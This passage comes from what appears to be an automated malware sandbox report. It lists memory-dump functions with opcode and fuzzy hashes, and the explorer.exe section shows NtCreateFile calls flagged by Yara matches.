                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                                          • Instruction ID: ca1407463739f4cc6318f333285b710a03fea2cbf9c26127bcb4951de3adb086
                                                                          • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                                          • Instruction Fuzzy Hash: AED0A9314011829AEB02AB54CA387683BBABB00208F582069800B0FB52C33A4A0AC605
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0163DB40, Relevance: .0, Instructions: 11COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                                          • Instruction ID: 5919b43c8b2e36c6210bd740055f330021d87f674f131f6e5e97824d01c7cddb
                                                                          • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                                          • Instruction Fuzzy Hash: 60C08C70280A01AAEB261F20CD01B003AA2BB50B41F8400A06702DA0F0EF78D801E610
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 016BA537, Relevance: .0, Instructions: 11COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                                          • Instruction ID: 78fc525edad24e05f20b9898cf37644d9ede10f3b21b0ac10943388b587c4962
                                                                          • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                                          • Instruction Fuzzy Hash: 23C01232080248BBCB126F82CC00F067B2AEBA4B60F008014BA080B9608632E970EA88
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01653A1C, Relevance: .0, Instructions: 10COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                          • Instruction ID: 6a876f1af10197ba69bc6cde8533e5b95ca6fdffe5949c4ed619f8528577e3ff
                                                                          • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                          • Instruction Fuzzy Hash: 27C08C32080248BBC7126E41DC00F017B2AE7A0B60F000020BA040A5608932ECA0D59C
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0163AD30, Relevance: .0, Instructions: 10COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                          • Instruction ID: ea696a07c6c5f9cc093143c2e8a90ebf95b7667fd06a97190d03036e14f6ea8b
                                                                          • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                          • Instruction Fuzzy Hash: FBC02B330C0248BBC7126F45DD00F117F2EE7A0B60F000020FA040B671C932EC60D58C
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 016476E2, Relevance: .0, Instructions: 10COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                                          • Instruction ID: 3023caa57df1cded349b9c6a04308664be25059544f19e05efa8cdaabaf08db5
                                                                          • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                                          • Instruction Fuzzy Hash: 0DC08C701411805BEB2A570CCE20B303A53AB08608F88019CEA01096A2C368A802C208
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 016636CC, Relevance: .0, Instructions: 10COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                                          • Instruction ID: c72951117906cb140e9f3713faa43179eb5d5e38f0cf4677af518298b4a9919a
                                                                          • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                                          • Instruction Fuzzy Hash: CFC02B70158480FBD7151F30CD00F147258F700A21F6403987321856F0EE289C00D104
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01657D50, Relevance: .0, Instructions: 7COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                          • Instruction ID: 4d263015d929b439c16fadfe26a27ffe9fa7e7b1d6dc9e6b6bdaa64f7cc60582
                                                                          • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                          • Instruction Fuzzy Hash: 66B092363019408FCF66DF18C480B1533E4FB44A40F8400D0E800CBA21D329E8008900
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01662ACB, Relevance: .0, Instructions: 5COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                          • Instruction ID: 51da53c2425ba1167f5df59b136376f28d5b19374ec2acc5bcc44c588241c4a7
                                                                          • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                          • Instruction Fuzzy Hash: 53B01232C10841CFCF02FF80CB10B197332FB00750F054494900127930C32DAC01CB40
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01679950, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e3f21d80f49d8eeb9755f61a92c31d90e3c29b37b806c81f38c4c487128b83bc
                                                                          • Instruction ID: 0a296e72baf603578107667072ccded18735b403909f79061b1d55dce90bc35f
                                                                          • Opcode Fuzzy Hash: e3f21d80f49d8eeb9755f61a92c31d90e3c29b37b806c81f38c4c487128b83bc
                                                                          • Instruction Fuzzy Hash: C49002A120140403D14079998C05A071009A7D0342F51C111E2054559ECA698C517175
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 016799D0, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 20ec48597734fdb93e9be513c08c09d69fb715dd3c04b003b8ff49fb6737ea26
                                                                          • Instruction ID: f577e244571832cc91135956587e7f42373b9602a0319d2c9a3dc86947d07abb
                                                                          • Opcode Fuzzy Hash: 20ec48597734fdb93e9be513c08c09d69fb715dd3c04b003b8ff49fb6737ea26
                                                                          • Instruction Fuzzy Hash: 8E9002A121100042D10475998805B071049A7E1241F51C112E2144558CC5698C616175
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0167B040, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2a5ed06176a1edfa11b7894b8ebdf297651498a2332c0efca6641935603f2d46
                                                                          • Instruction ID: f62063e16fc56f20fe261c8ee45331c4f45cb42beae6239d9dc1ae43b1d44b78
                                                                          • Opcode Fuzzy Hash: 2a5ed06176a1edfa11b7894b8ebdf297651498a2332c0efca6641935603f2d46
                                                                          • Instruction Fuzzy Hash: F89002A1601140434540B5998C058076019B7E1341391C221E0444564CC6A88855A2B5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01679820, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 770a43cfe5681ed59d9a20b30547a6f538d1f7e46b64ecabf42fa99b864f42aa
                                                                          • Instruction ID: 50aa879a791e6dfe4a54353307bed86e2b788fcdc6b25a9cefbbf084b3ea9291
                                                                          • Opcode Fuzzy Hash: 770a43cfe5681ed59d9a20b30547a6f538d1f7e46b64ecabf42fa99b864f42aa
                                                                          • Instruction Fuzzy Hash: 1890027124100402D14175998805A07100DB7D0281F91C112E0414558EC6958A56BAB1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 016798A0, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 591b07e0ef4557296777cdf540faf3635bb1bbe4c7eebe531b960faa96fe361e
                                                                          • Instruction ID: ffcf8b5f29cbf8f59d096e01944c9dd4c9b528de8acf2835923f21a137bd335a
                                                                          • Opcode Fuzzy Hash: 591b07e0ef4557296777cdf540faf3635bb1bbe4c7eebe531b960faa96fe361e
                                                                          • Instruction Fuzzy Hash: 5890026130100402D10275998815A07100DE7D1385F91C112E1414559DC6658953B172
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01679B00, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9097a5f34e1c775b68864e5b8df39d45a57b3f406f62e9e363bff846b2946ba3
                                                                          • Instruction ID: df04493c5c1aada825eb2be806dd85825daf1bd2de4db70737e175c33b746131
                                                                          • Opcode Fuzzy Hash: 9097a5f34e1c775b68864e5b8df39d45a57b3f406f62e9e363bff846b2946ba3
                                                                          • Instruction Fuzzy Hash: 0990026124100802D1407599C815B07100AE7D0641F51C111E0014558DC656896576F1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0167A3B0, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6706a8d02a66cdbddef1a94c9553a3f72890c8f5f4a78119a41fae933ac946f7
                                                                          • Instruction ID: a18f9c329e27cbdf80d57e4ff6b3cfebb461311630841c9be230179f4739fb89
                                                                          • Opcode Fuzzy Hash: 6706a8d02a66cdbddef1a94c9553a3f72890c8f5f4a78119a41fae933ac946f7
                                                                          • Instruction Fuzzy Hash: 2F90027120144002D1407599C845A0B6009B7E0341F51C511E0415558CC6558856A271
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01679A10, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2d9edd2b1cecf339c130bae8dfcdd2220ed84c5aab8e5d773dd18f9120a1aba4
                                                                          • Instruction ID: e876d9c018c0d77c632797e7c7f150f6c836e1dd5a04558133d7eca7074590b2
                                                                          • Opcode Fuzzy Hash: 2d9edd2b1cecf339c130bae8dfcdd2220ed84c5aab8e5d773dd18f9120a1aba4
                                                                          • Instruction Fuzzy Hash: E690027120140402D10075998C09B471009A7D0342F51C111E5154559EC6A5C8917571
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01679A80, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 84c7f9d751ed45f173720bd3fe4dfc5d0d674c7af0211dfb248a70347d801ed6
                                                                          • Instruction ID: 37e8a590b403568ba5066fdc21eeadf62c6506b046f17c0a73438ae2ee791b40
                                                                          • Opcode Fuzzy Hash: 84c7f9d751ed45f173720bd3fe4dfc5d0d674c7af0211dfb248a70347d801ed6
                                                                          • Instruction Fuzzy Hash: D790026120144442D14076998C05F0F5109A7E1242F91C119E4146558CC95588556771
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01679560, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 55399cb8c4c603015b898940ddbd0f2539d8b763b3dfb72db95e6083aa09cc53
                                                                          • Instruction ID: 80ce03d6acf883f974ce690196e3d639569dceec5f799e7a59238f7804d80eda
                                                                          • Opcode Fuzzy Hash: 55399cb8c4c603015b898940ddbd0f2539d8b763b3dfb72db95e6083aa09cc53
                                                                          • Instruction Fuzzy Hash: EB900265221000020145B9994A0590B1449B7D6391391C115F1406594CC66188656371
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01679520, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: dac73ac48b1076de2863342dfe89c282bfe576052421d066ffd7eb5762ba081a
                                                                          • Instruction ID: 5403642d2443052a1f45df4d4e5fae4b6b7c2ee00431f06ce14da09608e33f0e
                                                                          • Opcode Fuzzy Hash: dac73ac48b1076de2863342dfe89c282bfe576052421d066ffd7eb5762ba081a
                                                                          • Instruction Fuzzy Hash: 6D9002E1201140924500B699C805F0B5509A7E0241B51C116E1044564CC5658851A175
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0167AD30, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 778c5ca2607f8d0c38ae681390197b002860573e11223c45b1f3361c8b83364c
                                                                          • Instruction ID: 128f83e61e4e8c73b377d7f13a514d841977d845d12666d178ad70a24cc400fb
                                                                          • Opcode Fuzzy Hash: 778c5ca2607f8d0c38ae681390197b002860573e11223c45b1f3361c8b83364c
                                                                          • Instruction Fuzzy Hash: 8A900271A0500012914075998C15A47500AB7E0781B55C111E0504558CC9948A5563F1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 016795F0, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: bfde1287dde3650604175d6fe3f6620d2592744acdc22789dd1b1c8c5e24011b
                                                                          • Instruction ID: 9fc5801f580592621a66acd85918c25b082f6ec7b7badf4e70f7277000b4c90d
                                                                          • Opcode Fuzzy Hash: bfde1287dde3650604175d6fe3f6620d2592744acdc22789dd1b1c8c5e24011b
                                                                          • Instruction Fuzzy Hash: AB90027120100802D10475998C05A871009A7D0341F51C111E6014659ED6A588917171
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01679760, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 06ae38d176ed6aca2271e28e6290a998640c5a6c8e9cd38398bbb340bebe4c3d
                                                                          • Instruction ID: f8e1e7ebdca91334979b12213204e096f4c366254609b810bdb4e292f9ab2c7e
                                                                          • Opcode Fuzzy Hash: 06ae38d176ed6aca2271e28e6290a998640c5a6c8e9cd38398bbb340bebe4c3d
                                                                          • Instruction Fuzzy Hash: 2590027120100403D10075999909B071009A7D0241F51D511E041455CDD69688517171
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0167A770, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f6016443f41a5d0063ab5434e4dc2b5523c9bbfed402ec42a4d38b60ba448813
                                                                          • Instruction ID: df5bde7586cfb83f4d4cd806f1845e68edba95ade789b07dd893928e0ba5d62d
                                                                          • Opcode Fuzzy Hash: f6016443f41a5d0063ab5434e4dc2b5523c9bbfed402ec42a4d38b60ba448813
                                                                          • Instruction Fuzzy Hash: C090027520504442D50079999C05E871009A7D0345F51D511E041459CDC6948861B171
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01679770, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 41954b3242624263be56787313be6fb839649770b11266152397ae0e762420ad
                                                                          • Instruction ID: c22b9f0efbf1ea53e8fecb18cf82bb534bb77d426bcdc24592464eb5590dbb04
                                                                          • Opcode Fuzzy Hash: 41954b3242624263be56787313be6fb839649770b11266152397ae0e762420ad
                                                                          • Instruction Fuzzy Hash: 7990026120504442D10079999809E071009A7D0245F51D111E1054599DC6758851B171
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01679730, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a2929955d99d25e0fdeaeab643953235e9f9b5156b7130630dd785ca04371e44
                                                                          • Instruction ID: 44bcbf4b8f38de9191df54cf820ba48e701a262869cca310f474701b6033547a
                                                                          • Opcode Fuzzy Hash: a2929955d99d25e0fdeaeab643953235e9f9b5156b7130630dd785ca04371e44
                                                                          • Instruction Fuzzy Hash: A890026160500402D14075999819B071019A7D0241F51D111E0014558DC6998A5576F1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0167A710, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b8637749a8172f6a5a50efc9462ec21f46157d78720eb5512fd228d1f70a034a
                                                                          • Instruction ID: 33a8ad997c1eff11ceeb61d0bc1819dc6ff93c329b5ca406db14494d5daa7eec
                                                                          • Opcode Fuzzy Hash: b8637749a8172f6a5a50efc9462ec21f46157d78720eb5512fd228d1f70a034a
                                                                          • Instruction Fuzzy Hash: 4B900271301000529500BAD99C05E4B5109A7F0341B51D115E4004558CC59488616171
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01679650, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: bd4d4c039ef82ebc95ab9ce676d5544db5bfdcdb916a35912e07e35b0ac2efd2
                                                                          • Instruction ID: ed6c4153f7873ead85bf065d1ada38acf0cacf0604bfb3acd980edd32e67604f
                                                                          • Opcode Fuzzy Hash: bd4d4c039ef82ebc95ab9ce676d5544db5bfdcdb916a35912e07e35b0ac2efd2
                                                                          • Instruction Fuzzy Hash: BF90027120504842D14075998805E471019A7D0345F51C111E0054698DD6658D55B6B1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01679610, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1cc1a9ef3d19d2bd2f6706d9f562b57cdd9ca28a2d04a921b010cdcc9940e695
                                                                          • Instruction ID: b8e10a26b8ee01d5ad22a0851b9db88f381afe2a4228576ca5b4441ec4051d95
                                                                          • Opcode Fuzzy Hash: 1cc1a9ef3d19d2bd2f6706d9f562b57cdd9ca28a2d04a921b010cdcc9940e695
                                                                          • Instruction Fuzzy Hash: 0290027160500802D15075998815B471009A7D0341F51C111E0014658DC7958A5576F1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 016796D0, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e7614e7a1ad587bd43fe7a32b6e6841f97838c4821dc6bc817625896970b399a
                                                                          • Instruction ID: c342b4a1dca9bc9c8933ecc99e88d203c67dd37b5aada96e29632386d6cc91fa
                                                                          • Opcode Fuzzy Hash: e7614e7a1ad587bd43fe7a32b6e6841f97838c4821dc6bc817625896970b399a
                                                                          • Instruction Fuzzy Hash: 8190027120100842D10075998805F471009A7E0341F51C116E0114658DC655C8517571
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01679670, Relevance: .0, Instructions: 2COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                          • Instruction ID: 830dd5f92bcd4e9a860e5b08aabc285a73089b37ff9d50b558783a72b59c52b1
                                                                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                          • Instruction Fuzzy Hash:
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 016CFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 016CFDFA
                                                                          Strings
                                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 016CFE01
                                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 016CFE2B
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                          • API String ID: 885266447-3903918235
                                                                          • Opcode ID: 440216e6533a7d1f5e4e386ff0057c409d960d51c921dc9d0a3ed2b0fcd4b28b
                                                                          • Instruction ID: c5db0aa26fce551c72be20b7d813ef92d07000f77d64374bce81664026440c24
                                                                          • Opcode Fuzzy Hash: 440216e6533a7d1f5e4e386ff0057c409d960d51c921dc9d0a3ed2b0fcd4b28b
                                                                          • Instruction Fuzzy Hash: 55F0F672200602BFE6201A45DC0AF33BF5BEB44F30F24431CF628561E1DA62F8608AF4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Analysis Process: explorer.exe PID: 6700 Parent PID: 3424 explorer.exeCOMMON

                                                                          Executed Functions

                                                                          Function 009881B0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,00983B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00983B87,007A002E,00000000,00000060,00000000,00000000), ref: 009881FD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID: .z`
                                                                          • API String ID: 823142352-1441809116
                                                                          • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                          • Instruction ID: 87ead3c98cb454ba4aaa264bc0a3a45a5e0557d4b29b1ce52fdf1c8f15b3e3ac
                                                                          • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                          • Instruction Fuzzy Hash: B3F0B6B2200108ABCB08DF88DC85EEB77ADAF8C754F158248BA0D97241C630E8118BA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 009881AC, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,00983B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00983B87,007A002E,00000000,00000060,00000000,00000000), ref: 009881FD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID: .z`
                                                                          • API String ID: 823142352-1441809116
